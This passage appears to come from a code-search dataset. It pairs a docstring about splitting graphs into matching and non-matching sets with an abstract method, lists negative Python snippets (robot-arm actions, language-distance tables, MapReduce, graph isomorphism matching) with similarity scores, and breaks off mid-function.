Action.LOWER_ARM:\n alpha = 1.0\n if 'gripper_on_lid' in state.relations and 'gripper_level_with_lid' in state.relations \\\n or 'gripper_on_small' in state.relations and 'gripper_level_with_small' in state.relations \\\n or 'gripper_on_large' in state.relations and 'gripper_level_with_large' in state.relations:\n alpha = 0\n else:\n gripper = utils.get_object(state, 'gripper')\n if 'gripper_on_drawer' in state.relations and 'gripper_above_drawer' in state.relations:\n alpha *= 0.8\n if 'gripper_on_stack' in state.relations and 'gripper_above_stack' in state.relations:\n alpha *= 0.8\n if gripper.holding in ['lid', 'small', 'large']:\n alpha *= 0.8\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.z -= 1\n if gripper.z < 0:\n gripper.z = 0\n obj = utils.gripper_object(success_state)\n obj.z -= 1\n if obj.z < 0:\n obj.z = 0\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.RESET_ARM:\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to object position and holds object\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.x = 8\n gripper.y = 1\n gripper.z = 2\n\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n return results",
"def _merge(reactive_system: ReactiveSystem, red_state: int, blue_state: int,\n visited_blue_states=None) -> None:\n if visited_blue_states is None:\n visited_blue_states = set()\n # mergeable_depth = _mergeable_depth(_reactive_system, red_state, blue_state)\n # if mergeable_depth is None or red_state == blue_state:\n # return\n # merge the outputs\n if blue_state in reactive_system.output:\n for action in reactive_system.output[blue_state]:\n if red_state in reactive_system.output:\n reactive_system.output[red_state][action] = reactive_system.output[blue_state][action]\n else:\n reactive_system.output[red_state] = {action: reactive_system.output[blue_state][action]}\n del reactive_system.output[blue_state]\n\n # merge the transitions\n if blue_state in reactive_system.transitions:\n if blue_state not in visited_blue_states:\n visited_blue_states.add(blue_state)\n last_available_actions = set()\n while last_available_actions != set(reactive_system.transitions[blue_state].keys()):\n last_available_actions = set(reactive_system.transitions[blue_state].keys())\n for action in last_available_actions:\n if red_state not in reactive_system.transitions:\n reactive_system.transitions[red_state] = dict()\n if action in reactive_system.transitions[red_state]:\n _merge(reactive_system, reactive_system.transitions[red_state][action],\n reactive_system.transitions[blue_state][action], visited_blue_states)\n else:\n reactive_system.transitions[red_state][action] = reactive_system.transitions[blue_state][action]\n del reactive_system.transitions[blue_state]\n for source in reactive_system.transitions:\n for action in reactive_system.transitions[source]:\n if reactive_system.transitions[source][action] == blue_state:\n reactive_system.transitions[source][action] = red_state",
"def noDistMetric():\r\n raise NotImplementedError(\"Distance metric is not supported on feature type\")\r\n return noDistMetric",
"def squeeze_accept(partition):\n Write a function that\n - Sort districts by most Democratic heavy and most Republican heavy\n\n - Assign a base value of competitiveness for each district\n - Run chain, accept only if districts satisfy values under or order\n \"\"\"\n\n#--- CONSTRAINTS\n\n\"\"\"",
"def coalesce(self, discriminator):\r\n return self.coalesce_targets([self], discriminator)",
"def doppler_redshift():\n rv_unit = si.km / si.s\n C_KMS = _si.c.to_value(rv_unit)\n\n def convert_z_to_rv(z):\n zponesq = (1 + z) ** 2\n return C_KMS * (zponesq - 1) / (zponesq + 1)\n\n def convert_rv_to_z(rv):\n beta = rv / C_KMS\n return np.sqrt((1 + beta) / (1 - beta)) - 1\n\n return Equivalency(\n [(dimensionless_unscaled, rv_unit, convert_z_to_rv, convert_rv_to_z)],\n \"doppler_redshift\",\n )",
"def apply_action(self, action):\n agent = action['action_details']['agent_id']\n current_node = self.agents_location[agent][0]\n people_collected = self.people_location.get(current_node, 0)\n self.people_location[current_node] = 0\n self.people_collected[agent] += people_collected\n self.agents[agent-1].score += people_collected\n self.agents[agent-1].location = current_node\n self.agents[agent-1].t += 1\n self.agents[agent%2].t += 1\n # self.agents_location[agent%2+1][2] = max(self.agents_location[agent%2+1][2]-1,0)\n # if self.agents_location[agent%2+1][2] == 0:\n # self.agents_location[agent%2+1][0] = self.agents_location[agent%2+1][1]\n # self.agents[agent%2].traversing = False\n # self.agents[agent%2].location = self.agents_location[agent%2+1][1]\n\n if 'expansions' in action[\"action_details\"]:\n self.agents_expansions[action[\"action_details\"]['agent_id']] += action[\"action_details\"]['expansions']\n resulting_observ = self.actions_reactions[action[\"action_tag\"]](action[\"action_details\"])\n resulting_observ['collected'] = people_collected\n return resulting_observ",
"def applyAction(state, action):\r\n if action == 'N':\r\n return (state[0] - 1, state[1])\r\n\r\n if action == 'E':\r\n return (state[0], state[1] + 1)\r\n\r\n if action == 'W':\r\n return (state[0], state[1] - 1)\r\n\r\n if action == 'S':\r\n return (state[0] + 1, state[1])",
"def applyMapping(self):\n pass",
"def _make_simple_distances():\n distances = {}\n def sym(desired, supported, strength):\n \"Define a symmetric distance between languages.\"\n desired_t = tuple(desired.split('-'))\n supported_t = tuple(supported.split('-'))\n distances[desired_t, supported_t] = strength\n distances[supported_t, desired_t] = strength\n\n def one(desired, supported, strength):\n \"Define a one-way distance between languages.\"\n desired_t = tuple(desired.split('-'))\n supported_t = tuple(supported.split('-'))\n distances[desired_t, supported_t] = strength\n\n def ok(desired, supported):\n \"Define the most common type of link: a one-way distance of 10.\"\n one(desired, supported, 10)\n\n sym('no', 'nb', 1)\n sym('hr', 'bs', 4)\n sym('sh', 'bs', 4)\n sym('sr', 'bs', 4)\n sym('sh', 'hr', 4)\n sym('sr', 'hr', 4)\n sym('sh', 'sr', 4)\n sym('ssy', 'aa', 4)\n one('gsw', 'de', 4)\n one('lb', 'de', 4)\n sym('da', 'no', 8)\n sym('da', 'nb', 8)\n ok('ab', 'ru')\n ok('ach', 'en')\n ok('af', 'nl')\n ok('ak', 'en')\n ok('ay', 'es')\n ok('az', 'ru')\n ok('az-Latn', 'ru-Cyrl')\n ok('be', 'ru')\n ok('bem', 'en')\n ok('bh', 'hi')\n ok('bn', 'en')\n ok('bn-Beng', 'en-Latn')\n ok('br', 'fr')\n ok('ceb', 'fil')\n ok('chr', 'en')\n ok('ckb', 'ar')\n ok('co', 'fr')\n ok('crs', 'fr')\n ok('cy', 'en')\n ok('ee', 'en')\n ok('eo', 'en')\n ok('et', 'fi')\n ok('eu', 'es')\n ok('fo', 'da')\n ok('fy', 'nl')\n ok('ga', 'en')\n ok('gaa', 'en')\n ok('gd', 'en')\n ok('gl', 'es')\n ok('gn', 'es')\n ok('gu', 'hi')\n ok('ha', 'en')\n ok('haw', 'en')\n ok('ht', 'fr')\n ok('hy', 'ru')\n ok('hy-Armn', 'ru-Cyrl')\n ok('ia', 'en')\n ok('ig', 'en')\n ok('is', 'en')\n ok('jv', 'id')\n ok('ka-Geor', 'en-Latn')\n ok('ka', 'en')\n ok('kg', 'fr')\n ok('kk', 'ru')\n ok('km', 'en')\n ok('km-Khmr', 'en-Latn')\n ok('kn', 'en')\n ok('kn-Knda', 'en-Latn')\n ok('kri', 'en')\n ok('ku', 'tr')\n ok('ky', 'ru')\n ok('la', 'it')\n ok('lg', 'en')\n ok('ln', 'fr')\n ok('lo', 'en')\n ok('lo-Laoo', 'en-Latn')\n ok('loz', 'en')\n ok('lua', 'fr')\n ok('mfe', 'en')\n ok('mg', 'fr')\n ok('mi', 'en')\n ok('mk', 'bg')\n ok('ml', 'en')\n ok('ml-Mlym', 'en-Latn')\n ok('mn', 'ru')\n ok('mr', 'hi')\n ok('ms', 'id')\n ok('mt', 'en')\n ok('my', 'en')\n ok('my-Mymr', 'en-Latn')\n ok('ne', 'en')\n ok('ne-Deva', 'en-Latn')\n sym('nn', 'nb', 10)\n ok('nn', 'no')\n ok('nso', 'en')\n ok('ny', 'en')\n ok('nyn', 'en')\n ok('oc', 'fr')\n ok('om', 'en')\n ok('or', 'en')\n ok('or-Orya', 'en-Latn')\n ok('pa', 'en')\n ok('pa-Guru', 'en-Latn')\n ok('pcm', 'en')\n ok('ps', 'en')\n ok('ps-Arab', 'en-Latn')\n ok('qu', 'es')\n ok('rm', 'de')\n ok('rn', 'en')\n ok('rw', 'fr')\n ok('sa', 'hi')\n ok('sd', 'en')\n ok('sd-Arab', 'en-Latn')\n ok('si', 'en')\n ok('si-Sinh', 'en-Latn')\n ok('sn', 'en')\n ok('so', 'en')\n ok('sq', 'en')\n ok('st', 'en')\n ok('su', 'id')\n ok('sw', 'en')\n ok('ta', 'en')\n ok('ta-Taml', 'en-Latn')\n ok('te', 'en')\n ok('te-Telu', 'en-Latn')\n ok('tg', 'ru')\n ok('ti', 'en')\n ok('ti-Ethi', 'en-Latn')\n ok('tk', 'ru')\n ok('tk-Latn', 'ru-Cyrl')\n ok('tlh', 'en')\n ok('tn', 'en')\n ok('to', 'en')\n ok('tt', 'ru')\n ok('tum', 'en')\n ok('ug', 'zh')\n ok('ur', 'en')\n ok('ur-Arab', 'en-Latn')\n ok('uz', 'ru')\n ok('uz-Latn', 'ru-Cyrl')\n ok('wo', 'fr')\n ok('xh', 'en')\n ok('yi', 'en')\n ok('yi-Hebr', 'en-Latn')\n ok('yo', 'en')\n ok('zu', 'en')\n sym('sr-Latn', 'sr-Cyrl', 5)\n one('zh-Hans', 'zh-Hant', 15)\n one('zh-Hant', 'zh-Hans', 19)\n sym('zh-Hant-HK', 'zh-Hant-MO', 3)\n\n return distances",
"def test_reduce(self):\n self.assertEqual(15, reduce(lambda x, y: x + y, [1, 2, 3, 4, 5]))\n self.assertEqual(16, reduce(lambda x, y: x + y, [1, 2, 3, 4, 5], 1))",
"def MapReduce(inputs, mapper, reducer):\n collector = defaultdict(list)\n\n for input in inputs:\n for key, value in mapper(input):\n collector[key].append(value)\n\n return [output\n for key, values in collector.items()\n for output in reducer(key,values)]"
] | [
"0.52857256",
"0.5162497",
"0.5107433",
"0.5057547",
"0.5027394",
"0.5027394",
"0.5027394",
"0.5027394",
"0.5027394",
"0.49870852",
"0.49124625",
"0.48178238",
"0.47693735",
"0.47630015",
"0.47151983",
"0.4696542",
"0.46933955",
"0.4672102",
"0.46205962",
"0.46201527",
"0.4614642",
"0.45813182",
"0.4547565",
"0.45459363",
"0.45360172",
"0.45087424",
"0.44910946",
"0.44584632",
"0.44497505",
"0.44495073",
"0.4433434",
"0.44123834",
"0.43926623",
"0.43869296",
"0.43854743",
"0.43777984",
"0.43438688",
"0.43420577",
"0.43416506",
"0.43183646",
"0.42923748",
"0.42864397",
"0.42713362",
"0.4264644",
"0.4260175",
"0.42580622",
"0.42545423",
"0.42484024",
"0.42401454",
"0.42368394",
"0.42367944",
"0.4232317",
"0.423111",
"0.42097294",
"0.4203806",
"0.41928",
"0.41876984",
"0.41849113",
"0.41849113",
"0.4172821",
"0.41716844",
"0.41674468",
"0.41669297",
"0.41669297",
"0.4159644",
"0.41522807",
"0.4133575",
"0.4125013",
"0.41216597",
"0.41194004",
"0.41091457",
"0.41014346",
"0.40973914",
"0.4092423",
"0.40914539",
"0.4089791",
"0.4074075",
"0.40670788",
"0.40666837",
"0.40603545",
"0.40533498",
"0.40518868",
"0.40506652",
"0.40465528",
"0.40417793",
"0.40388808",
"0.40335056",
"0.40321434",
"0.40282336",
"0.40235195",
"0.4021871",
"0.40196854",
"0.40129867",
"0.40064207",
"0.39993584",
"0.3990803",
"0.3990653",
"0.3990356",
"0.39897263",
"0.39865828"
] | 0.5502056 | 0 |
Split the graphs into two sets, those matching the distinction and those not matching. Which graphs are which are stored in a | def splitGraphs(self, graphs):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def compare_graphs(self):\n\t\tpass",
"def splitNodes(matching):\n outer = set(range(self.n))\n inner = set([])\n for (u, v) in matching:\n if u in outer:\n outer.remove(u)\n if v in outer:\n outer.remove(v)\n inner.add(u)\n inner.add(v)\n return list(inner), list(outer)",
"def sub_graph_merging(self):",
"def split(gt, isotropic):\n edges = get_edges(gt, isotropic)\n cytosol = edges == 0\n membrane = edges != 0\n return cytosol, membrane",
"def cleanGraph2(self,graph):\n return [graph[i] for i in range(len(graph)-1) if graphp[i]!=graph[i+1]]",
"def chang_graphs():\n g1 = Graph(\"[}~~EebhkrRb_~SoLOIiAZ?LBBxDb?bQcggjHKEwoZFAaiZ?Yf[?dxb@@tdWGkwn\",\n loops=False, multiedges=False)\n g2 = Graph(\"[~z^UipkkZPr_~Y_LOIiATOLBBxPR@`acoojBBSoWXTaabN?Yts?Yji_QyioClXZ\",\n loops=False, multiedges=False)\n g3 = Graph(\"[~~vVMWdKFpV`^UGIaIERQ`\\DBxpA@g`CbGRI`AxICNaFM[?fM\\?Ytj@CxrGGlYt\",\n loops=False, multiedges=False)\n return [g1,g2,g3]",
"def _mapped_graph_list(self,G1, sname, POWER=None):\n logger.debug(f\"Matching circuit Graph nodes: {G1.nodes} edges:{G1.edges(data=True)}\")\n mapped_graph_list = {}\n for lib_ele in self.lib:\n block_name = lib_ele['name']\n if block_name==sname:\n continue\n G2 = lib_ele['graph']\n\n # Digital instances only transistors:\n if self._is_digital(G2,sname):\n continue\n if not self._is_small(G1, G2):\n continue\n\n if len(G2.nodes)<=len(G1.nodes):\n logger.debug(f\"Matching: {block_name} : {G2.nodes} {G2.edges(data=True)}\")\n GM = isomorphism.GraphMatcher(\n G1, G2,\n node_match = isomorphism.categorical_node_match(['inst_type'],\n ['nmos']),\n edge_match = isomorphism.categorical_edge_match(['weight'], [1]))\n if GM.subgraph_is_isomorphic():\n logger.debug(f\"ISOMORPHIC : {block_name}\")\n map_list = []\n\n for Gsub in GM.subgraph_isomorphisms_iter():\n\n all_nd = [key for key in Gsub.keys() if 'net' not in G1.nodes[key][\"inst_type\"]]\n logger.debug(f\"matched inst: {all_nd}\")\n if len(all_nd)>1 and self._is_clk(Gsub) :\n logger.debug(f\"Discarding match due to clock {Gsub}\")\n continue\n elif len(all_nd)>1 and self._is_do_not_identify(Gsub,sname):\n logger.debug(f\"Discarding match due to user constraint {Gsub}\")\n continue\n \n if block_name.startswith('DP') or block_name.startswith('CMC'):\n if G1.nodes[all_nd[0]]['values'] == G1.nodes[all_nd[1]]['values'] and \\\n compare_balanced_tree(G1,get_key(Gsub,'DA'),get_key(Gsub,'DB'),[all_nd[0]],[all_nd[1]]) :\n if 'SA' in Gsub.values() and \\\n compare_balanced_tree(G1,get_key(Gsub,'SA'),get_key(Gsub,'SB'),[all_nd[0]],[all_nd[1]]):\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)}\")\n # remove pseudo diff pair\n elif block_name.startswith('DP') and POWER is not None and get_key(Gsub,'S') in POWER:\n logger.debug(f\"skipping pseudo DP {POWER}: {' '.join(Gsub)}\")\n else:\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)} power:{POWER}\")\n else:\n logger.debug(f\"Discarding match {block_name} due to non matching branches\")\n elif block_name.startswith('SCM') and G1.nodes[all_nd[0]]['values'] != G1.nodes[all_nd[1]]['values']:\n logger.debug(f\"Discarding match {block_name} due to value mismatch\")\n\n else:\n map_list.append(Gsub)\n logger.debug(f\"Matched Lib: {' '.join(Gsub.values())}\")\n logger.debug(f\"Matched Circuit: {' '.join(Gsub)}\")\n if len(map_list)>1:\n fix_order_for_multimatch(G1,map_list,map_list[-1])\n mapped_graph_list[block_name] = map_list\n\n return mapped_graph_list",
"def build_disconnected_test_graph():\n graph = build_triangle_graph()\n g2 = build_triangle_graph()\n g3 = build_triangle_graph()\n\n merge_graphs(graph, g2)\n merge_graphs(graph, g3)\n\n return graph",
"def _build_graphs(self):\n g1 = self._build_graph1()\n g2 = self._build_graph2(g1)\n return g1, g2",
"def matching_graph(n):\r\n k_n = nx.complete_graph(n)\r\n G = nx.Graph()\r\n for i in k_n.edges():\r\n G.add_node(i)\r\n w = []\r\n for i in k_n.edges():\r\n for j in k_n.edges():\r\n if ((j[0] not in i) and (j[1] not in i) and ((i,j) not in w) and ((j,i) not in w)): \r\n w.append((i,j))\r\n G.add_edge(i,j)\r\n return G",
"def obtain_groups(input_results, input_vertices):\n\tbest_first, best_second = [], []\n\tfor i in xrange(len(input_results)):\n\t\tfirst_group, second_group = best_group(input_results[i].solution, input_vertices)\n\t\tbest_first.append(first_group)\n\t\tbest_second.append(second_group)\n\n\tcomplete_first, complete_second = drop_groups(best_first, best_second)\n\n\treturn complete_first[0], complete_second[0]",
"def get_subgraphs(graph):\n nodes_powerset = get_nodes_combinations(graph)\n #print(\"Doing\")\n #draw_graph(graph)\n subgraphs = []\n for nodes in nodes_powerset:\n subg = graph.subgraph(nodes)\n nodes = subg.nodes(data=True)\n if nx.is_weakly_connected(subg):\n subgraphs.append(subg)\n return subgraphs",
"def clean_edges(self):\n for from_node in self.all_nodes():\n for to_node in self.all_nodes():\n if from_node == to_node:\n continue\n dup = list(filter(lambda x: x.from_node == from_node and x.to_node == to_node, self.edges))\n if len(dup) > 1:\n for d in dup[1:]:\n self.edges.remove(d)",
"def _delete_edges(self, to_be_deleted_set, adj_dict):\n for pair in to_be_deleted_set:\n first_node = pair[0]\n second_node = pair[1]\n adj_dict.pop((first_node, second_node), None)",
"def compare_nodes(G,all_match_pairs,match_pair,traversed,node1,node2, ports_weight):\n logger.debug(f\"comparing {node1},{node2}, traversed {traversed}\")\n nbrs1 = sorted(set(G.neighbors(node1)) - set(traversed))\n #remove dummies\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=7]))\n nbrs2 = sorted(set(G.neighbors(node2)) - set(traversed))\n #remove dummies\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=7]))\n logger.debug(f\"node1:{node1},property: {G.nodes[node1]},neigbors1: {nbrs1}\")\n logger.debug(f\"node2:{node2},property: {G.nodes[node2]},neigbors2: {nbrs2}\")\n if not nbrs1 or not nbrs2:\n if compare_two_nodes(G, node1, node2, ports_weight):\n match_pair[node1] = node2\n logger.debug(f\"no new neihbours, returning recursion {match_pair}\")\n return\n elif len(nbrs1)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n logger.debug(f\"skipping high fanout nets due to large computation, {node1} {nbrs1}\")\n traversed.append(node1)\n return\n elif len(nbrs2)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n traversed.append(node2)\n logger.debug(f\"skipping high fanout nets due to large computation, {node2} {nbrs2}\")\n return\n\n if node1 == node2:\n if node1 in match_pair.keys() or node1 in match_pair.values():\n logger.debug(\"avoid existing pair wise symmetry\")\n return\n logger.debug(f\"single node {node1}, nbrs {nbrs1}, nbr_weight {[G.get_edge_data(node1,nbr) for nbr in nbrs1]}\")\n SD_nbrs= [nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]\n ## TBD: filter based on primitive constraints\n ## Right now will try to figure out S/D paths\n if len(SD_nbrs) ==0:\n logger.debug(f\"No SD paths found to traverse\")\n match_pair[node1]=node1\n elif len(SD_nbrs) ==1:\n logger.debug(f\"traversing single S/D path {SD_nbrs}\")\n match_pair[node1]=node1\n traversed.append(node1)\n compare_nodes(G,all_match_pairs,match_pair,traversed,SD_nbrs[0],SD_nbrs[0],ports_weight)\n else:\n logger.debug(f\" multiple nodes diverging {SD_nbrs}\")\n logger.debug(f\"nbr weights: {SD_nbrs} {[G.get_edge_data(node1, nbr)['weight'] for nbr in SD_nbrs ]}\")\n match_pair[node1]=node1\n traversed.append(node1)\n new_sp=sorted(set(SD_nbrs)-set(traversed))\n all_match_pairs_local={}\n for nbr1,nbr2 in combinations(new_sp, 2):\n logger.debug(f\"recursive pair call from single branch {nbr1} {nbr2}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n if new_pair:\n #new_pair[nbr1]=nbr2\n all_match_pairs_local[nbr1+'_'+nbr2] = new_pair\n all_match_pairs_local={k: v for k, v in all_match_pairs_local.items() if len(v)>0}\n if len(all_match_pairs_local)==1:\n match_pair.update( all_match_pairs_local[list(all_match_pairs_local.keys())[0]])\n logger.debug(f\"found inline pair: {pprint.pformat(match_pair, indent=4)}\")\n else:\n for nbr1 in new_sp:\n if (nbr1+'_'+nbr1 not in all_match_pairs.keys()):\n logger.debug(f\"recursive single branch call from single branch {nbr1} {nbr1}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr1,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr1] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif nbrs1 == nbrs2:\n logger.debug(f\"traversing converging branch\")\n match_pair[node1]=node2\n traversed+=[node1,node2]\n nbrs1=sorted(set(nbrs1)-set([node1,node2]))\n logger.debug(f\"all non traversed neighbours: {nbrs1}\")\n if len(nbrs1)==1:\n nbr1=nbr2=nbrs1[0]\n logger.debug(f\"keeping single converged branch inline {nbr1} {nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n else:\n for nbr1,nbr2 in combinations_with_replacement(nbrs1,2):\n logger.debug(f\"recursive call from converged branch {nbr1} {nbr2}\")\n if nbr1+'_'+nbr2 not in all_match_pairs.keys():\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr2] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif compare_two_nodes(G,node1,node2,ports_weight):\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]))\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=2]))\n match_pair[node1]=node2\n traversed+=[node1,node2]\n logger.debug(f\"Traversing parallel branches from {node1},{node2} {nbrs1}, {nbrs2}\")\n nbrs1_wt = [G.get_edge_data(node1, nbr)['weight'] for nbr in nbrs1]\n nbrs2_wt = [G.get_edge_data(node2, nbr)['weight'] for nbr in nbrs2]\n unique_match=find_unique_matching_branches(G,nbrs1,nbrs2,ports_weight)\n if len(nbrs1)==0 or len(nbrs2)==0:\n logger.debug(f\"no new SD neihbours, returning recursion {match_pair}\")\n elif len(nbrs1) ==1 and len(nbrs2)==1:\n logger.debug(f\"traversing binary branch\")\n compare_nodes(G,all_match_pairs,match_pair,traversed,nbrs1.pop(),nbrs2.pop(),ports_weight)\n elif unique_match:\n logger.debug(f'traversing unique matches {unique_match}')\n match_pair[node1]=node2\n traversed+=[node1,node2]\n for nbr1,nbr2 in unique_match.items():\n logger.debug(f\"recursive call from binary {node1}:{node2} to {nbr1}:{nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n elif len(nbrs1_wt)>len(set(nbrs1_wt))>1 and len(nbrs2_wt)>len(set(nbrs2_wt))>1:\n logger.debug(f\"setting new start points {node1} {node2}\")\n match_pair[node1]=node2\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n else:\n match_pair = {}\n logger.debug(f\"end all traversal from binary branch {node1} {node2}\")\n\n else:\n match_pair = {}\n logger.debug(f\"end of recursion branch, matches {match_pair}\")",
"def _match_identical_nodes(self):\n\n for job_name_b in self._topo_b_nodes:\n for job_name_a in self._unresolved_a_nodes:\n if self._is_node_identical(job_name_a, job_name_b):\n self._identical_nodes[job_name_b] = job_name_a\n self._unresolved_a_nodes.remove(job_name_a)\n self._unresolved_b_nodes.remove(job_name_b)\n break",
"def mut_space(graph: nx.Graph) -> t.Iterator[t.Tuple[int, t.List[str]]]:\n genes = get_attr(graph, 'gene')\n xs = sorted(chain.from_iterable(((g.P1, g.A1), (g.P2, g.A2)) for g in genes))\n return ((g, sorted(set(x[1] for x in gg))) for g, gg in groupby(xs, key=op.itemgetter(0)))",
"def __get_merge_nodelist(induced_ordering):\n duplicate = list(induced_ordering) # create a copy of the list containing the induced ordering\n return {duplicate.pop(), duplicate.pop()} # return the vertices corresponding to the s-t cut",
"def better_partition(graph, part1, part2, independent_set_extraction_strategy):\n\n # TODO: When there are more hyperplanes it often chooses the resulting partition\n # TODO: as best even though it results in more colors (e.g. for DSJC 125.5)\n\n if part2 is None or len(part2) == 0:\n return True\n\n if part1 is None or len(part1) == 0:\n return False\n\n # Remove colors from one endpoint of each illegal edge in each partition.\n nodes_to_delete1 = nodes_to_delete(graph, part1, strategy=independent_set_extraction_strategy)\n nodes_to_color1 = {n for n in graph.nodes() if n not in nodes_to_delete1}\n nr_of_colors1 = len(set(part1.values()))\n\n nodes_to_delete2 = nodes_to_delete(graph, part2, strategy=independent_set_extraction_strategy)\n nodes_to_color2 = {n for n in graph.nodes() if n not in nodes_to_delete2}\n nr_of_colors2 = len(set(part2.values()))\n\n avg1 = float(len(nodes_to_color1)) / nr_of_colors1\n avg2 = float(len(nodes_to_color2)) / nr_of_colors2\n\n return avg1 > avg2",
"def CompareGraphsSpectrum(graph1, graph2):\n laplacian1 = nx.spectrum.laplacian_spectrum(graph1)\n laplacian2 = nx.spectrum.laplacian_spectrum(graph2)\n k1 = select_k(laplacian1)\n k2 = select_k(laplacian2)\n # take the fewer dimensions to describe the result\n k = min(k1, k2)\n # the similarity is the sum of the eukleidian distance of the most\n # important nodes\n similarity = sum((laplacian1[:k] - laplacian2[:k])**2)\n return similarity",
"def line_graph_forbidden_subgraphs():\n from sage.graphs.all import Graph\n from sage.graphs.generators.basic import ClawGraph\n graphs = [ClawGraph()]\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2],\n 5: [3]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3, 4],\n 1: [2, 3, 4],\n 3: [4],\n 2: [5]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2, 3]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2],\n 5: [3, 4]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3, 4],\n 1: [2, 3, 4],\n 3: [4],\n 5: [2, 0, 1]\n }))\n\n graphs.append(Graph({\n 5: [0, 1, 2, 3, 4],\n 0: [1, 4],\n 2: [1, 3],\n 3: [4]\n }))\n\n graphs.append(Graph({\n 1: [0, 2, 3, 4],\n 3: [0, 4],\n 2: [4, 5],\n 4: [5]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3, 4],\n 2: [3, 4],\n 3: [4]\n }))\n\n return graphs",
"def bipartite_sets(G):\n color=bipartite_color(G)\n X=set(n for n in color if color[n]==1)\n Y=set(n for n in color if color[n]==0)\n return (X,Y)",
"def setSplit (set1, set2):\n common = []\n rem1 = []\n rem2 = []\n for elem in set1:\n if elem in set2:\n common.append (elem)\n else:\n rem1.append (elem)\n for elem in set2:\n if elem in set1:\n pass\n else:\n rem2.append (elem)\n return rem1, common, rem2",
"def _pair_based_graph_cut(self, graph):\n for node in self._find_paired_nodes(graph):\n graph.remove_node(node)\n return",
"def node_diff(self):\n if self.input1 is None or self.input2 is None:\n raise Exception(\"Missing input: please run the populate() method first\")\n if self.node_dict1 is None or self.node_dict2 is None:\n self.make_node_dict()\n # Initialize dictonaries to keep track of the nodes in respnse 1 and response 2\n g1={}\n g2={}\n # Set to keep track of the union of all curie ids\n curie_set = set()\n for curie in self.node_dict1.keys():\n g1[curie] = {}\n # intersection is only in the g1 dictionary\n g1[curie]['intersection'] = set()\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g1[curie]['node'] = set()\n curie_set.add(curie)\n for curie in self.node_dict2.keys():\n g2[curie] = {}\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g2[curie]['node'] = set()\n curie_set.add(curie)\n node_names1 = []\n node_names2 = []\n\n # extract all node ids (i.e. \"n0\",\"n1\",ect...)\n if len(self.input1['question_graph']['nodes'])>0:\n if 'id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['id'] for x in self.input1['question_graph']['nodes']]\n elif 'node_id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['node_id'] for x in self.input1['question_graph']['nodes']]\n if len(self.input2['question_graph']['nodes'])>0:\n if 'id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['id'] for x in self.input2['question_graph']['nodes']]\n elif 'node_id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['node_id'] for x in self.input2['question_graph']['nodes']]\n \n # initialize the result dictonary\n diff_dict = {}\n diff_dict[\"-1|-1\"] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # initialize node id tuple keys\n for id1 in node_names1:\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # iterate through answers\n for answer1 in self.input1['answers']:\n for answer2 in self.input2['answers']:\n for id1 in answer1['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer1['node_bindings'][id1], str):\n bindings1 = [answer1['node_bindings'][id1]]\n elif isinstance(answer1['node_bindings'][id1], list):\n bindings1 = 